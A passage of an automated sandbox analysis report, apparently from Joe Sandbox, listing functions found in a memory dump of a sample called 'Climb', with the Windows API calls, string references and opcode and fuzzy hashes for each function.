Part of subcall function 00A9DB23: _free.LIBCMT ref: 00A9DB4C

_free.LIBCMT ref: 00A9DBAD

Part of subcall function 00A92D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4), ref: 00A92D4E
Part of subcall function 00A92D38: GetLastError.KERNEL32(00B31DC4,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4,00B31DC4), ref: 00A92D60

_free.LIBCMT ref: 00A9DBB8
_free.LIBCMT ref: 00A9DBC3
_free.LIBCMT ref: 00A9DC17
_free.LIBCMT ref: 00A9DC22
_free.LIBCMT ref: 00A9DC2D
_free.LIBCMT ref: 00A9DC38

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: c3b260d7f7e63bb2bf3b3417972ded63cdf369e3de9c749255f21254ff4715b8
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: 77111C72641B04BADE30BBB0CE07FCB77DCAF24710F414C19B399AA252DA75B6448790

Function 00ACE30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00ACE328
LoadStringW.USER32(00000000), ref: 00ACE32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00ACE345
LoadStringW.USER32(00000000), ref: 00ACE34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00ACE390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00ACE36D

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: fe31fbfe21efee26204db89185f30e7ba492f203fc6d6425009ceeaa1c6d2ffe
Instruction ID: eca07bd5b48fe370315ce1610251f32b7f2ff39c1e454d587ded6d5c2a00fd87
Opcode Fuzzy Hash: fe31fbfe21efee26204db89185f30e7ba492f203fc6d6425009ceeaa1c6d2ffe
Instruction Fuzzy Hash: 5E016DF2900208BFE752EBE49D89EFA776CDB08300F014595B70AE6041EA74AE858B75

Function 00AD1312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00AD1322
EnterCriticalSection.KERNEL32(00000000,?), ref: 00AD1334
TerminateThread.KERNEL32(00000000,000001F6), ref: 00AD1342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00AD1350
CloseHandle.KERNEL32(00000000), ref: 00AD135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 00AD136F
LeaveCriticalSection.KERNEL32(00000000), ref: 00AD1376

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 053640963d03e06122184d3f06f47014f046aefbb7684174c65939b762c157c8
Instruction ID: 8d2cb303f88b968aafef1faa813e8da742bb3efd184272ac2e34903b3b9a7353
Opcode Fuzzy Hash: 053640963d03e06122184d3f06f47014f046aefbb7684174c65939b762c157c8
Instruction Fuzzy Hash: EAF0EC32042612BBD7429BD4EE49BEABB3AFF04302F401121F202968A087749476DF90

Function 00AE26BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00AE281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AE283E
WSAGetLastError.WSOCK32 ref: 00AE284F
htons.WSOCK32(?,?,?,?,?), ref: 00AE2938
inet_ntoa.WSOCK32(?), ref: 00AE28E9

Part of subcall function 00AC433E: _strlen.LIBCMT ref: 00AC4348

Part of subcall function 00AE3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00ADF669), ref: 00AE3C9D

_strlen.LIBCMT ref: 00AE2992

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 9c2c3bbc299b734b9da44f283fb7cbfae74985463621189902765cfa1faa1e40
Instruction ID: 55ce7ca9f9ac89065be5f693190e228c45c7df54a57c417b07d67fc93e9b36d4
Opcode Fuzzy Hash: 9c2c3bbc299b734b9da44f283fb7cbfae74985463621189902765cfa1faa1e40
Instruction Fuzzy Hash: 40B1D231604340AFD324EF65C885F2ABBF9AF84358F54895CF45A4B2A2DB31ED46CB91

Function 00A90527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00A9042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A90446
__allrem.LIBCMT ref: 00A9045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A9047B
__allrem.LIBCMT ref: 00A90492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A904B0

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction ID: add304ba57075456885094d07edb816f4208247daac325f02c7c2e6f49b11d0f
Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction Fuzzy Hash: B181E872700706AFDF20AF69DD81FAB73E8AF557A4F24412AF511DB681EB70D9008754

Function 00A96571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A88649,00A88649,?,?,?,00A967C2,00000001,00000001,8BE85006), ref: 00A965CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A967C2,00000001,00000001,8BE85006,?,?,?), ref: 00A96651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A9674B
__freea.LIBCMT ref: 00A96758

Part of subcall function 00A93B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A86A79,?,0000015D,?,?,?,?,00A885B0,000000FF,00000000,?,?), ref: 00A93BC5

__freea.LIBCMT ref: 00A96761
__freea.LIBCMT ref: 00A96786

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 2b9bb935b3d922e2ce1aa254b3d3c62297c560e4726f2359759129e780f06c71
Instruction ID: 3fd767a6386cc2430118c6c47eb3458370648d87cd2e61be7c47eee26d4288b5
Opcode Fuzzy Hash: 2b9bb935b3d922e2ce1aa254b3d3c62297c560e4726f2359759129e780f06c71
Instruction Fuzzy Hash: 2C51DD72B00206ABEF258FA4CD81FBB77EAEF40754B154669F918D6140EB34DC5096A0

Function 00AEC63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

Part of subcall function 00AED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AEC10E,?,?), ref: 00AED415
Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED451
Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4C8
Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AEC72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AEC785
RegCloseKey.ADVAPI32(00000000), ref: 00AEC7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00AEC7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00AEC853
RegCloseKey.ADVAPI32(?), ref: 00AEC85F

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 60ddaa8c3713a185e46d4926811cc7abcc26818e438ac534ce7d15b32bf6caa0
Instruction ID: 49f7a8371bb46b1cdfea50ff9934c6eff45a4c6eee4d54cd9428fe87a5c281fe
Opcode Fuzzy Hash: 60ddaa8c3713a185e46d4926811cc7abcc26818e438ac534ce7d15b32bf6caa0
Instruction Fuzzy Hash: B781AF71208281AFC715DF25C985E2ABBF5FF84318F14855CF45A8B2A2DB31ED46CB91

Function 00AC009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00AC00A9
SysAllocString.OLEAUT32(00000000), ref: 00AC0150
VariantCopy.OLEAUT32(00AC0354,00000000), ref: 00AC0179
VariantClear.OLEAUT32(00AC0354), ref: 00AC019D
VariantCopy.OLEAUT32(00AC0354,00000000), ref: 00AC01A1
VariantClear.OLEAUT32(?), ref: 00AC01AB

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 0395d0e2009f445378966166510003d21580496842b4d1e031831263255de0ea
Instruction ID: 722f12193dc1088775ad1357d26fa801f80d076f760536f626057f939ae7d450
Opcode Fuzzy Hash: 0395d0e2009f445378966166510003d21580496842b4d1e031831263255de0ea
Instruction Fuzzy Hash: 4651D635600310EACF20AFA49889F69B3B5EF55321F25944FEA06DF296DB709C44CB56

Function 00AD9B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00A641EA: _wcslen.LIBCMT ref: 00A641EF

Part of subcall function 00A68577: _wcslen.LIBCMT ref: 00A6858A

GetOpenFileNameW.COMDLG32(00000058), ref: 00AD9F2A
_wcslen.LIBCMT ref: 00AD9F4B
_wcslen.LIBCMT ref: 00AD9F72
GetSaveFileNameW.COMDLG32(00000058), ref: 00AD9FCA

Strings

X, xrefs: 00AD9E57

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 99ed426b89f562f71e168d113273390f9a64aea2f75437661e1db158b7ada0ce
Instruction ID: a670fba0e5552864793d128426a14d69dbb50e9d19aaebd7c1780a5620adb79e
Opcode Fuzzy Hash: 99ed426b89f562f71e168d113273390f9a64aea2f75437661e1db158b7ada0ce
Instruction Fuzzy Hash: 5EE170716043409FD724EF24C981A6AB7F5BF88314F04896DF89A9B3A2DB31DD45CB92

Function 00AD6ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AD6F21
CoInitialize.OLE32(00000000), ref: 00AD707E
CoCreateInstance.OLE32(00B00CC4,00000000,00000001,00B00B34,?), ref: 00AD7095
CoUninitialize.OLE32 ref: 00AD7319

Strings

.lnk, xrefs: 00AD6EFF, 00AD6F69, 00AD7025

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 44b99f77704a58b96b489ebf6aa6aa02d287944a80717132d3d44ef254605a87
Instruction ID: c4fafa83f38e77156ba4c904b6347f15d8ee041d6a64a4727f7e650dbc9bf674
Opcode Fuzzy Hash: 44b99f77704a58b96b489ebf6aa6aa02d287944a80717132d3d44ef254605a87
Instruction Fuzzy Hash: EAD12871508201AFC304EF64C981E6BB7E8FF98744F40496DF5968B2A2EB71ED45CB92

Function 00A61B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0

BeginPaint.USER32(?,?,?), ref: 00A61B35
GetWindowRect.USER32(?,?), ref: 00A61B99
ScreenToClient.USER32(?,?), ref: 00A61BB6
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A61BC7
EndPaint.USER32(?,?,?,?,?), ref: 00A61C15
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00AA3287

Part of subcall function 00A61C2D: BeginPath.GDI32(00000000), ref: 00A61C4B

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: f513d1c0ecf0087811b862d34e83dd64272e5eb0780986d57e3db517389ac4ab
Instruction ID: 7685e6c11e40983a736fc214b2b8ef36ba7a2654819a140790dfc3a42570fd07
Opcode Fuzzy Hash: f513d1c0ecf0087811b862d34e83dd64272e5eb0780986d57e3db517389ac4ab
Instruction Fuzzy Hash: 0D41D171104300AFDB21DF64DC85FBA7BB8EF56320F140669FA648B2A1C7319945DB62

Function 00AD1196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00AD11B3
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00AD11EE
EnterCriticalSection.KERNEL32(?), ref: 00AD120A
LeaveCriticalSection.KERNEL32(?), ref: 00AD1283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00AD129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00AD12C8

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 3d48ddb05fb5f5e2191690460ac0fc14b775deac72f24f61e521007c435480cb
Instruction ID: ccbb18c867fde3d949633933df2ee31c0c699458fd9efc530cf1601d255df2e9
Opcode Fuzzy Hash: 3d48ddb05fb5f5e2191690460ac0fc14b775deac72f24f61e521007c435480cb
Instruction Fuzzy Hash: CF415C71A00204EFDF05EF94DD85AAAB7B9FF04310F1441A9ED019B296DB30DE66DBA4

Function 00AF8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00ABFBEF,00000000,?,?,00000000,?,00AA39E2,00000004,00000000,00000000), ref: 00AF8CA7
EnableWindow.USER32(00000000,00000000), ref: 00AF8CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00AF8D2C
ShowWindow.USER32(00000000,00000004), ref: 00AF8D40
EnableWindow.USER32(00000000,00000001), ref: 00AF8D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00AF8D8A

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 0ff95b9349b0a97f6326e2754301b4d9bc2e7832cdb4e6d41cde6f41b0ea8295
Instruction ID: e14e470393b15670f8a7538863983debfb11fb784c8aa28edf5b719cd7056d56
Opcode Fuzzy Hash: 0ff95b9349b0a97f6326e2754301b4d9bc2e7832cdb4e6d41cde6f41b0ea8295
Instruction Fuzzy Hash: 94419630601248EFDB25DFA4C989BB57BF1FF45314F2441A9F6184B2A2CB396856CB60

Function 00AE2D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00AE2D45

Part of subcall function 00ADEF33: GetWindowRect.USER32(?,?), ref: 00ADEF4B

GetDesktopWindow.USER32 ref: 00AE2D6F
GetWindowRect.USER32(00000000), ref: 00AE2D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00AE2DB2
GetCursorPos.USER32(?), ref: 00AE2DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00AE2E3C

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: cb9015be1eb566f9db81ac42c50bf3fdf29225311f35091ae619550d51f8086d
Instruction ID: 2606114abb0934f4ac6e5740f6aa44076bd945aeab6ea79bfd2cd258ea9964d8
Opcode Fuzzy Hash: cb9015be1eb566f9db81ac42c50bf3fdf29225311f35091ae619550d51f8086d
Instruction Fuzzy Hash: 4C31D072505355AFC721DF55CC45FABB7AAFBC4314F00091AF585D7181DA30E909CB92

Function 00AC55E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00AC55F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AC5616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AC564E
_wcslen.LIBCMT ref: 00AC566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00AC5674
_wcsstr.LIBVCRUNTIME ref: 00AC567E

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 212d7ecaefac43dd4fdf281c7b9076d89ed8fb5e501427002bebdf0b2328b32a
Instruction ID: 85cfda44b61e373da8f33cbbc612c7975ec9b7ad566593ae1665a0e49dd81f8e
Opcode Fuzzy Hash: 212d7ecaefac43dd4fdf281c7b9076d89ed8fb5e501427002bebdf0b2328b32a
Instruction Fuzzy Hash: B7214632A04600BBEB16AB74DC49F7BBBA9DF45720F09402DF805CA091EB70EC81D760

Function 00AD6263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A65851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A655D1,?,?,00AA4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A65871

_wcslen.LIBCMT ref: 00AD62C0
CoInitialize.OLE32(00000000), ref: 00AD63DA
CoCreateInstance.OLE32(00B00CC4,00000000,00000001,00B00B34,?), ref: 00AD63F3
CoUninitialize.OLE32 ref: 00AD6411

Strings

.lnk, xrefs: 00AD62BB, 00AD6306, 00AD63CA

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

